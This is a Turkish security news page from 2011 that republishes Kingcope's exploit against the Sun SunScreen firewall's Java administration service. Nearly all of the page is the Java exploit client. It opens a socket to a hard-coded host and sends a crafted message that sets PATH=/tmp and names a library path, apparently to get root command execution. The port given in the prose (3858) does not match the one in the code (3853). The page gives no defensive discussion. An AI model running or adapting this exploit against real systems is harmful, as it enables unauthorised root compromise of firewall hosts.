Sun Microsystems SunScreen Firewall Root Exploit - Güvenlik Haberleri

Security Expert Network

Sun Microsystems SunScreen Firewall Root Exploit - Güvenlik Haberleri - root \ Cyber-Security

(Relased 26.01.2011 13:28:48)

Sun Microsystems SunScreen Firewall Root Exploit

SunScreen, Sun firmasının 3858. port üzerinden SunOS makinelerini uzaktan administre edilebilen bir java protokolüdür. "Kingcope" tarafından bu yazılımda ki zaafiyeti sömüren exploit kodları;

import java.net.*;
import java.io.*;
import java.util.*;
import java.text.DateFormat;
public class SimpleClient {

public static void main(String args[]) {

String str;

try {

Socket s1 = new Socket("192.168.2.3", 3853);

InputStream is = s1.getInputStream();

DataInputStream dis = new DataInputStream(is);

OutputStream s1out = s1.getOutputStream();
DataOutputStream dos = new DataOutputStream(s1out);

dos.writeByte(1);
dos.writeByte(0);
dos.writeShort(0);
dos.writeInt(0);
dos.writeByte(3);
dos.writeByte(0);
dos.writeShort(2000);
dos.writeShort(0);
dos.writeShort(0);

dos.writeUTF("0xtest");
dos.writeByte(3);
dos.writeByte(1);
dos.writeByte(1);
dos.writeByte(1);
dos.writeInt(3);
dos.writeInt(0);
dos.writeInt(0);

dos.writeUTF("PATH=/tmp");
dos.writeUTF("lib/screenname");

dos.writeUTF("admin1");

str = dis.readLine();
System.out.println(str);

str = dis.readLine();
System.out.println(str);

dis.close();
dos.close();
s1.close();
} catch (ConnectException connExc) {
System.err.println("Could not connect to the server.");
} catch (IOException e) {
// foo
}
}
}

Derecelendir

Kaynak

http://www.exploit-db.com/exploits/16041/

İçerik İhbarı

Bağlantılar Bg.org.tr

CS - Security Expert Network

AUP&TOS